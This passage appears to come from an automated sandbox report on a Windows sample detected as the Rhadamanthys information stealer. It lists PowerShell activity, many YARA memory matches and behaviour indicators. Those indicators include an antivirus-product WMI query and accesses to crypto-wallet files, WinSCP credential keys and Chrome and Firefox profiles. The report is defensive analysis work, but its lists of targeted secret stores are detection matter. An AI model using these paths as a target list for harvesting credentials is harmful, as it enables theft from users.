Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9494D0 GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle, 3_2_00007FF79E9494D0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E93E220 GetSystemTimePreciseAsFileTime, 3_2_00007FF79E93E220
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\regsvr32.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 11.3.OpenWith.exe.1bd88071e18.84.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1636622080.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1790719264.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1637295094.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1505528408.000001BD854A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1603758838.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1606697672.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1601304637.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1807031317.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1594385953.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1598054710.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1625351972.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1605446278.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1599122967.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1631177009.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1604550057.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1835330246.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1622398648.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1630915907.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1610447240.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1623646235.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1592648399.000001BD88031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1595094361.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1611340042.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1603435540.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1596720432.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1612017140.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1593833995.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1623171299.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1614239162.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1594138733.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1614513286.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1625054748.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1665607668.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1610863973.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1604127571.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1656743401.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1615770138.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1597744056.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1489116263.00000000030E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1533595393.000000001C0C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1596995655.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1601020298.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1662849713.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1607422599.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1592648399.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1605580653.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1655729634.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1600689319.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1594826093.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1595345338.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1630028343.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1596030593.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1596532747.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1616130125.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1613817370.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1612242561.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1607767904.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: OpenWith.exe, 0000000B.00000003.1624543124.000001BD875A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Electrum\config
Source: OpenWith.exe, 0000000B.00000003.1594021561.000001BD8758D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ty.jaxx
Source: OpenWith.exe, 0000000B.00000003.1623646235.000001BD8822A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: OpenWith.exe, 0000000B.00000003.1623646235.000001BD8822A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Exodus
Source: OpenWith.exe, 0000000B.00000003.1636222676.000001BD88055000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: sk\AppData\Roaming\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000001.00000002.1559772878.00007FFAAC630000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\startupCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release Jump to behavior
